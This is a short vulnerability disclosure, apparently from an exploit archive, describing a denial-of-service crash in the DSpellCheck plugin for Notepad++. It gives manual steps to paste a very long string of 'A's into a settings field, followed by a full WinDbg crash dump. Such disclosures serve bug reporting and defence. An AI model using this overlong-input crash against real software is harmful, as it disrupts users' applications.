扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 |
# Exploit Title: Notepad++ - DSpellCheck v1.2.12.0 plugin[DOS] # Exploit Author: sajith # Vendor Homepage: http://notepad-plus-plus.org/ # Software Link: http://notepad-plus-plus.org/download/ # vulnerable plugin Version: DSpellCheck v 1.2.12.0 # Tested in: Windows XP SP3 EN,Notepad ++ 6.5.4 POC: 1)install notepadd ++ 2)open up plugins tab and select Dspellcheck and click on settings 3)In "hunspell dictionaries path" field enter large character say 80000 A's and click on "apply" ########################################################## (cf8.4f8): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00690044 ebx=00000000 ecx=00000294 edx=01f56070 esi=01f56060 edi=00000000 eip=7c919fca esp=01d0ed74 ebp=01d0ede8 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 ntdll!RtlpWaitForCriticalSection+0x5b: 7c919fca ff4010 inc dword ptr [eax+10h] ds:0023:00690054=bc5d0050 #################################################### FAULTING_IP: ntdll!RtlpWaitForCriticalSection+5b 7c919fca ff4010 inc dword ptr [eax+10h] EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff) ExceptionAddress: 7c919fca (ntdll!RtlpWaitForCriticalSection+0x0000005b) ExceptionCode: c0000005 (Access violation) ExceptionFlags: 00000000 NumberParameters: 2 Parameter[0]: 00000001 Parameter[1]: 00690054 Attempt to write to address 00690054 FAULTING_THREAD: 000004f8 PROCESS_NAME: notepad++.exe . FAULTING_MODULE: 7c900000 ntdll DEBUG_FLR_IMAGE_TIMESTAMP: 52c4419f ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at "0x%08lx" referenced memory at "0x%08lx". The memory could not be "%s". EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at "0x%08lx" referenced memory at "0x%08lx". The memory could not be "%s". EXCEPTION_PARAMETER1: 00000001 EXCEPTION_PARAMETER2: 00690054 WRITE_ADDRESS: 00690054 FOLLOWUP_IP: DSpellCheck!setInfo+577f5 012f4cb5 59 pop ecx CRITICAL_SECTION: 00f56060 -- (!cs -s 00f56060) BUGCHECK_STR: APPLICATION_FAULT_STRING_DEREFERENCE_INVALID_POINTER_WRITE_WRONG_SYMBOLS PRIMARY_PROBLEM_CLASS: STRING_DEREFERENCE DEFAULT_BUCKET_ID: STRING_DEREFERENCE LAST_CONTROL_TRANSFER: from 7c901046 to 7c919fca STACK_TEXT: WARNING: Stack unwind information not available. Following frames may be wrong. 01d0ede8 7c901046 00f56060 012feb19 01f56060 ntdll!RtlpWaitForCriticalSection+0x5b 01d0ee00 012f4cb5 00000013 012f8787 00000003 ntdll!RtlEnterCriticalSection+0x46 01d0ee48 012f15f0 908eab95 01654af8 00000000 DSpellCheck!setInfo+0x577f5 01d0ee7c 012f166b 01f54058 0130e360 00000040 DSpellCheck!setInfo+0x54130 01d0ee8c 012aecaa 01f54058 0130e360 01f56056 DSpellCheck!setInfo+0x541ab 01d0ee90 01f54058 0130e360 01f56056 00000000 DSpellCheck!setInfo+0x117ea 01d0ee94 0130e360 01f56056 00000000 016549a8 0x1f54058 01d0ee98 01f56056 00000000 016549a8 00000000 DSpellCheck!setInfo+0x70ea0 01d0ee9c 00000000 016549a8 00000000 00000000 0x1f56056 SYMBOL_STACK_INDEX: 2 SYMBOL_NAME: DSpellCheck!setInfo+577f5 FOLLOWUP_NAME: MachineOwner MODULE_NAME: DSpellCheck IMAGE_NAME: DSpellCheck.dll STACK_COMMAND: ~4s ; kb BUCKET_ID: WRONG_SYMBOLS FAILURE_BUCKET_ID: STRING_DEREFERENCE_c0000005_DSpellCheck.dll!setInfo Followup: MachineOwner #################################################### |
体验盒子
